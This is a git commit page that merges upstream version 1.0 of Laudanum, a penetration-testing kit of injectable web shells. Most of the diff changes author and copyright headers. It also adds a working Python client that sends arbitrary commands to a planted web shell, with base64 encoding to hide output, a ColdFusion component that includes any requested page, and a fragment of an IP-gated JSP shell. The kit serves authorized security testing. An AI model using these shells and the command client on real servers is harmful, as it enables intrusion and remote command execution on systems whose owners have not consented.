Commit 144199c9 authored by Sophie Brun's avatar Sophie Brun

Merge tag 'upstream/1.0+r36'

Upstream version 1.0+r36
parents c34d550f f624405e
...@@ -2,9 +2,18 @@ The Team ...@@ -2,9 +2,18 @@ The Team
======================================================== ========================================================
- Kevin Johnson - Kevin Johnson
- Project Lead - Project Lead
- @secureideas
- kevin@secureideas.com
- Tim Medin - Tim Medin
- Project Lead - Project Lead
- @timmedin
- tim@securitywhole.com
- John Sawyer
- Project Lead
- @johnhsawyer
- john@inguardians.com
- Justin Searle - Justin Searle
- Core Developer - Core Developer
...@@ -12,4 +21,4 @@ The Team ...@@ -12,4 +21,4 @@ The Team
Additional Coding Additional Coding
======================================================== ========================================================
- Robin Wood - Robin Wood
- Jason Gillam (Wordpress Plugin) - Jason Gillam (Wordpress Plugin)
\ No newline at end of file
Laudanum: Injectable Web Exploit Code v0.8 Laudanum: Injectable Web Exploit Code v1.0
By Kevin Johnson <kjohnson@secureideas.net> By Kevin Johnson <kjohnson@secureideas.com>
and the Laudanum Development Team and the Laudanum Development Team
Project Website: http://laudanum.secureideas.net Project Website: http://laudanum.professionallyevil.com
Sourceforge Site: http://sourceforge.net/projects/laudanum Sourceforge Site: http://sourceforge.net/projects/laudanum
SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum
------------------------------------------------------------------------------- -------------------------------------------------------------------------------
** Copyright (C) 2014 Kevin Johnson and the Laudanum Project Team ** Copyright (C) 2015 Kevin Johnson and the Laudanum Project Team
** **
** This program is free software; you can redistribute it and/or modify ** This program is free software; you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by ** it under the terms of the GNU General Public License as published by
......
...@@ -5,19 +5,20 @@ ...@@ -5,19 +5,20 @@
' *** A Collection of Injectable Files used during a Penetration Test ' *** A Collection of Injectable Files used during a Penetration Test
' *** ' ***
' *** More information is available at: ' *** More information is available at:
' *** http://laudanum.secureideas.net ' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net ' *** laudanum@secureideas.net
' *** ' ***
' *** Project Leads: ' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net ' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin <tim@counterhack.com> ' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' *** ' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** Copyright 2015 by The Laudanum Team
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** ' ***
' *** This file provides access to DNS on the system. ' *** This file provides access to DNS on the system.
' *** Written by Tim Medin <tim@counterhack.com> ' *** Written by Tim Medin <tim@securitywhole.com>
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** This program is free software; you can redistribute it and/or ' *** This program is free software; you can redistribute it and/or
......
...@@ -8,19 +8,20 @@ ...@@ -8,19 +8,20 @@
' *** A Collection of Injectable Files used during a Penetration Test ' *** A Collection of Injectable Files used during a Penetration Test
' *** ' ***
' *** More information is available at: ' *** More information is available at:
' *** http://laudanum.secureideas.net ' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net ' *** laudanum@secureideas.net
' *** ' ***
' *** Project Leads: ' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net ' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin <tim@counterhack.com> ' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' *** ' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** Copyright 2015 by The Laudanum Team
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** ' ***
' *** This file provides access to the file system. ' *** This file provides access to the file system.
' *** Written by Tim Medin <tim@counterhack.com> ' *** Written by Tim Medin <tim@securitywhole.com>
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** This program is free software; you can redistribute it and/or ' *** This program is free software; you can redistribute it and/or
......
...@@ -8,19 +8,20 @@ ...@@ -8,19 +8,20 @@
' *** A Collection of Injectable Files used during a Penetration Test ' *** A Collection of Injectable Files used during a Penetration Test
' *** ' ***
' *** More information is available at: ' *** More information is available at:
' *** http://laudanum.secureideas.net ' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net ' *** laudanum@secureideas.net
' *** ' ***
' *** Project Leads: ' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net ' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin <tim@counterhack.com> ' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' *** ' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** Copyright 2015 by The Laudanum Team
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** ' ***
' *** This file provides access as a proxy. ' *** This file provides access as a proxy.
' *** Written by Tim Medin <tim@counterhack.com> ' *** Written by Tim Medin <tim@securitywhole.com>
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** This program is free software; you can redistribute it and/or ' *** This program is free software; you can redistribute it and/or
......
...@@ -5,19 +5,20 @@ ...@@ -5,19 +5,20 @@
' *** A Collection of Injectable Files used during a Penetration Test ' *** A Collection of Injectable Files used during a Penetration Test
' *** ' ***
' *** More information is available at: ' *** More information is available at:
' *** http://laudanum.secureideas.net ' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net ' *** laudanum@secureideas.net
' *** ' ***
' *** Project Leads: ' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net ' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin <tim@counterhack.com> ' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' *** ' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** Copyright 2015 by The Laudanum Team
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** ' ***
' *** Updated and fixed by Robin Wood <Digininja> ' *** Updated and fixed by Robin Wood <Digininja>
' *** Updated and fixed by Tim Medin <tim@counterhack.com ' *** Updated and fixed by Tim Medin <tim@securitywhole.com>
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** This program is free software; you can redistribute it and/or ' *** This program is free software; you can redistribute it and/or
......
...@@ -9,14 +9,15 @@ ...@@ -9,14 +9,15 @@
*** A Collection of Injectable Files used during a Penetration Test *** A Collection of Injectable Files used during a Penetration Test
*** ***
*** More information is available at: *** More information is available at:
*** http://laudanum.secureideas.net *** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net *** laudanum@secureideas.net
*** ***
*** Project Leads: *** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net> *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin <tim@counterhack.com> *** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
*** ***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** Copyright 2015 by The Laudanum Team
*** ***
******************************************************************************** ********************************************************************************
*** ***
......
<!---
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson @secureideas <kjohnson@secureideas.net
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides access to shell access on the system.
*** Sourced from http://www.bennadel.com/blog/726-coldfusion-application-cfc-tutorial-and-application-cfc-reference.htm
*** Modified by Tim Medin
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
--->
<cfcomponent
displayname="Application"
output="true"
hint="Handle the application.">
<!--- Set up the application. --->
<cfset THIS.Name = "AppCFC" />
<cfset THIS.ApplicationTimeout = CreateTimeSpan( 0, 0, 1, 0 ) />
<cfset THIS.SessionManagement = true />
<cfset THIS.SetClientCookies = false />
<!--- Define the page request properties. --->
<cfsetting
requesttimeout="20"
showdebugoutput="false"
enablecfoutputonly="false"
/>
<cffunction
name="OnApplicationStart"
access="public"
returntype="boolean"
output="false"
hint="Fires when the application is first created.">
<!--- Return out. --->
<cfreturn true />
</cffunction>
<cffunction
name="OnSessionStart"
access="public"
returntype="void"
output="false"
hint="Fires when the session is first created.">
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnRequestStart"
access="public"
returntype="boolean"
output="false"
hint="Fires at first part of page processing.">
<!--- Define arguments. --->
<cfargument
name="TargetPage"
type="string"
required="true"
/>
<!--- Return out. --->
<cfreturn true />
</cffunction>
<cffunction
name="OnRequest"
access="public"
returntype="void"
output="true"
hint="Fires after pre page processing is complete.">
<!--- Define arguments. --->
<cfargument
name="TargetPage"
type="string"
required="true"
/>
<!--- Include the requested page. --->
<cfinclude template="#ARGUMENTS.TargetPage#" />
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnRequestEnd"
access="public"
returntype="void"
output="true"
hint="Fires after the page processing is complete.">
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnSessionEnd"
access="public"
returntype="void"
output="false"
hint="Fires when the session is terminated.">
<!--- Define arguments. --->
<cfargument
name="SessionScope"
type="struct"
required="true"
/>
<cfargument
name="ApplicationScope"
type="struct"
required="false"
default="#StructNew()#"
/>
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnApplicationEnd"
access="public"
returntype="void"
output="false"
hint="Fires when the application is terminated.">
<!--- Define arguments. --->
<cfargument
name="ApplicationScope"
type="struct"
required="false"
default="#StructNew()#"
/>
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnError"
access="public"
returntype="void"
output="true"
hint="Fires when an exception occures that is not caught by a try/catch.">
<!--- Define arguments. --->
<cfargument
name="Exception"
type="any"
required="true"
/>
<cfargument
name="EventName"
type="string"
required="false"
default=""
/>
<!--- Return out. --->
<cfreturn />
</cffunction>
</cfcomponent>
...@@ -7,14 +7,15 @@ ...@@ -7,14 +7,15 @@
*** A Collection of Injectable Files used during a Penetration Test *** A Collection of Injectable Files used during a Penetration Test
*** ***
*** More information is available at: *** More information is available at:
*** http://laudanum.secureideas.net *** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net *** laudanum@secureideas.net
*** ***
*** Project Leads: *** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net *** Kevin Johnson @secureideas <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com> *** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
*** ***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** Copyright 2015 by The Laudanum Team
*** ***
******************************************************************************** ********************************************************************************
*** ***
......
#!/usr/bin/env python
'''
*******************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides a console for working with remote shells.
*** //TODO: Add the ability to strip out extra text so only shell output is shown
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., Temple
*** Place - Suite Boston, MA USA.
***
***************************************************************************** */
'''
import urllib2
import urllib
import base64
import re
origurl = None
origdata = None
replace = []
usebase64 = False
def sendrequest(url, data=None):
if data != None:
resp = urllib2.urlopen(url, data)
else:
resp = urllib2.urlopen(url)
html = resp.read()
resp.close()
if usebase64:
matches = re.findall('[A-Za-z0-9/+]+={0,2}', html)
for m in matches:
print base64.b64decode(m)
else:
print html
# TODO: update this to allow filtering before and after the command
def preparecmd(cmd):
global replace
global usebase64
for r in replace:
cmd = cmd.replace(r[0], r[1])
if usebase64:
cmd += ' | base64 -w 0'
cmd = urllib.quote(cmd)
return cmd
def dointeract():
global origurl
print "Type the commands to run on the remote server"
while True:
cmd = raw_input('> ')
if cmd in ['stop', 'quit', 'exit']:
break
cmd = preparecmd(cmd)
url = origurl.replace('CMD', cmd)
data = origdata.replace('CMD', cmd)
sendrequest(url, data)
def main():
global origurl
global replace
global usebase64
global origdata
import argparse
parser = argparse.ArgumentParser(description='Easy remote shell.')
parser.add_argument('-i', '--interactive', help='interactive', dest='interactive', action='store_true', default=False)
parser.add_argument('-u', '--url', required=True, help='The url', metavar='URL', dest='url')
parser.add_argument('-d', '--data', help='data to send via post', metavar='DATA', dest='data')
parser.add_argument('-c', '--cmd', help='The command to execute (use ++ instead of - unless other override is defined)', metavar='COMMAND', dest='cmd', nargs='+')
parser.add_argument('-r', '--replace', nargs=2, action='append', help='Characters to replace', dest='replace')
# not encryption, don't pretend it is or use it thusly
parser.add_argument('-b', '--base64', help='Attempt to hide with base64 encoded (*Nix Only(', dest='base64', action='store_true', default=False)
args = parser.parse_args()
origurl = args.url
origdata = args.data if args.data else ''
replace = args.replace if args.replace else []
usebase64 = args.base64
if not args.interactive and args.cmd == None:
parser.print_help()
print 'argument -c/--cmd or -i/--interactive are required'
exit(0)
if args.cmd:
#check for the default overrite
if replace and [r[1] for r in replace if r[1]=='-']:
print 'override of - found, ignoring ++'
else:
replace.append(['++', '-'])
cmd = preparecmd(' '.join(args.cmd))
url = origurl.replace('CMD', cmd)
data = origdata.replace('CMD', cmd)
sendrequest(url, data)
if args.interactive:
try:
import readline
except:
pass
dointeract()
if __name__ == '__main__':
main()
\ No newline at end of file
<%@ page import="java.util.*,java.io.*"%> <%@ page import="java.util.*,java.io.*"%>
<% <%
/*
*******************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides access to shell access to the system.
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., Temple
*** Place - Suite Boston, MA USA.
***
*****************************************************************************
*/
if (request.getRemoteAddr() != "4.4.4.4") { if (request.getRemoteAddr() != "4.4.4.4") {
response.sendError(HttpServletResponse.SC_NOT_FOUND) response.sendError(HttpServletResponse.SC_NOT_FOUND)
return; return;
......
...@@ -5,19 +5,20 @@ ...@@ -5,19 +5,20 @@
*** A Collection of Injectable Files used during a Penetration Test *** A Collection of Injectable Files used during a Penetration Test
*** ***
*** More information is available at: *** More information is available at:
*** http://laudanum.secureideas.net *** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net *** laudanum@secureideas.net
*** ***
*** Project Leads: *** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin <tim@counterhack.com> *** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
*** ***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** Copyright 2015 by The Laudanum Team
*** ***
******************************************************************************** ********************************************************************************
*** ***
*** This file provides access to DNS on the system. *** This file provides access to DNS on the system.
*** Written by Tim Medin <tim@counterhack.com> *** Written by Tim Medin <tim@securitywhole.com>
*** ***
******************************************************************************** ********************************************************************************
*** This program is free software; you can redistribute it and/or *** This program is free software; you can redistribute it and/or
......
...@@ -5,19 +5,20 @@ ...@@ -5,19 +5,20 @@
*** A Collection of Injectable Files used during a Penetration Test *** A Collection of Injectable Files used during a Penetration Test
*** ***
*** More information is available at: *** More information is available at:
*** http://laudanum.secureideas.net *** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net *** laudanum@secureideas.net
*** ***
*** Project Leads: *** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin <tim@counterhack.com> *** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
*** ***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** Copyright 2015 by The Laudanum Team
*** ***
******************************************************************************** ********************************************************************************
*** ***
*** This file allows browsing of the file system. *** This file allows browsing of the file system.
*** Written by Tim Medin <tim@counterhack.com> *** Written by Tim Medin <tim@securitywhole.com>
*** 2013-12-28 Updated by Jason Gillam - fixed parent folder *** 2013-12-28 Updated by Jason Gillam - fixed parent folder
*** ***
******************************************************************************** ********************************************************************************
......
<?php
/*
******************************************************************************